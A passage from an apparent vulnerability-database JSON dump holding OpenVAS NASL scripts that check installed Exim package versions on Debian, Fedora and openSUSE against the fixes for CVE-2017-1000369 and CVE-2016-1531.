value:\"AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2017/dsa-3888.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"exim4 on Debian Linux\");\n script_tag(name: \"insight\", value: \"Exim (v4) is a mail transport agent. exim4 is the metapackage depending\non the essential components for a basic exim4 installation.\");\n script_tag(name: \"solution\", value: \"For the\nfull details, please refer to their advisory published at:\nhttps://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt \nFor the oldstable distribution (jessie), this problem has been fixed\nin version 4.84.2-2+deb8u4.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u1.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your exim4 packages.\");\n script_tag(name: \"summary\", value: \"The Qualys Research Labs discovered a memory leak in the Exim mail\ntransport agent. This is not a security vulnerability in Exim by itself,\nbut can be used to exploit a vulnerability in stack handling.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.84.2-2+deb8u4\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.84.2-2+deb8u4\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.84.2-2+deb8u4\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.84.2-2+deb8u4\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.84.2-2+deb8u4\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.84.2-2+deb8u4\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.84.2-2+deb8u4\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.84.2-2+deb8u4\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.84.2-2+deb8u4\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.84.2-2+deb8u4\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.89-2+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.89-2+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.89-2+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.89-2+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.89-2+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.89-2+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.89-2+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.89-2+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.89-2+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.89-2+deb9u1\", rls_regex:\"DEB9.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:34:20", "description": "The Qualys Research Labs discovered a memory leak in the Exim mail\ntransport agent. This is not a security vulnerability in Exim by itself,\nbut can be used to exploit a vulnerability in stack handling.", "cvss3": {}, "published": "2017-06-19T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3888-1 (exim4 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703888", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703888", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3888.nasl 14280 2019-03-18 14:50:45Z cfischer $\n# Auto-generated from advisory DSA 3888-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703888\");\n script_version(\"$Revision: 14280 $\");\n script_cve_id(\"CVE-2017-1000369\");\n script_name(\"Debian Security Advisory DSA 3888-1 (exim4 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:50:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-06-19 00:00:00 +0200 (Mon, 19 Jun 2017)\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3888.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(8|9)\");\n script_tag(name:\"affected\", value:\"exim4 on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), this problem has been fixed\nin version 4.84.2-2+deb8u4.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.89-2+deb9u1.\n\nFor the unstable distribution (sid), this problem will be fixed soon.\n\nWe recommend that you upgrade your exim4 packages.\");\n script_tag(name:\"summary\", value:\"The Qualys Research Labs discovered a memory leak in the Exim mail\ntransport agent. This is not a security vulnerability in Exim by itself,\nbut can be used to exploit a vulnerability in stack handling.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.84.2-2+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.84.2-2+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.84.2-2+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.84.2-2+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.84.2-2+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.84.2-2+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.84.2-2+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.84.2-2+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.84.2-2+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.84.2-2+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.89-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.89-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.89-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.89-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.89-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.89-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.89-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.89-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.89-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.89-2+deb9u1\", rls:\"DEB9\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:34:06", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-09-01T00:00:00", "type": "openvas", "title": "Fedora Update for exim FEDORA-2017-f5177f3a16", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-1000369"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310873330", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873330", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_f5177f3a16_exim_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for exim FEDORA-2017-f5177f3a16\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873330\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-09-01 07:11:20 +0200 (Fri, 01 Sep 2017)\");\n script_cve_id(\"CVE-2017-1000369\");\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for exim FEDORA-2017-f5177f3a16\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"exim on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-f5177f3a16\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NI3SG43RHDCSIG63F3GJFP2DWDBJS36Y\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.89~5.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-07-24T12:54:07", "description": "A local root privilege escalation\nvulnerability was found in Exim, Debian", "cvss3": {}, "published": "2016-03-14T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3517-1 (exim4 - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703517", "href": "http://plugins.openvas.org/nasl.php?oid=703517", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3517.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3517-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703517);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-1531\");\n script_name(\"Debian Security Advisory DSA 3517-1 (exim4 - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-03-14 00:00:00 +0100 (Mon, 14 Mar 2016)\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3517.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"exim4 on Debian Linux\");\n script_tag(name: \"insight\", value: \"Exim (v4) is a mail transport agent.\nexim4 is the metapackage depending on the essential components for a basic\nexim4 installation.\");\n script_tag(name: \"solution\", value: \"For the oldstable distribution\n(wheezy), this problem has been fixed in version 4.80-7+deb7u2.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 4.84.2-1.\n\nFor the testing distribution (stretch), this problem has been fixed\nin version 4.86.2-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 4.86.2-1.\n\nWe recommend that you upgrade your exim4 packages.\");\n script_tag(name: \"summary\", value: \"A local root privilege escalation\nvulnerability was found in Exim, Debian's default mail transfer agent, in\nconfigurations using the perl_startup option (Only Exim via\nexim4-daemon-heavy enables Perl support).\n\nTo address the vulnerability, updated Exim versions clean the complete\nexecution environment by default, affecting Exim and subprocesses such\nas transports calling other programs, and thus may break existing\ninstallations. New configuration options (keep_environment,\nadd_environment) were introduced to adjust this behavior.\n\nMore information can be found in the upstream advisory at\nhttps://www.exim.org/static/doc/CVE-2016-1531.txt\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.80-7+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.80-7+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.80-7+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.80-7+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.80-7+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.80-7+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.80-7+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.80-7+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.80-7+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.80-7+deb7u2\", rls_regex:\"DEB7.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.84.2-1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.84.2-1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.84.2-1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.84.2-1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.84.2-1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.84.2-1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.84.2-1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.84.2-1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.84.2-1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.84.2-1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.86.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.86.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.86.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.86.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.86.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.86.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.86.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.86.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.86.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.86.2-1\", rls_regex:\"DEB9.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:35:15", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-14T00:00:00", "type": "openvas", "title": "Fedora Update for exim FEDORA-2016-0", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310807496", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807496", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for exim FEDORA-2016-0\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807496\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-03-14 06:07:56 +0100 (Mon, 14 Mar 2016)\");\n script_cve_id(\"CVE-2016-1531\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for exim FEDORA-2016-0\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'exim'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"exim on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-0\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2016-March/178772.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"exim\", rpm:\"exim~4.85.2~1.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:34:46", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-03-12T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for exim (openSUSE-SU-2016:0721-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1531"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310851232", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851232", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851232\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-03-12 06:15:07 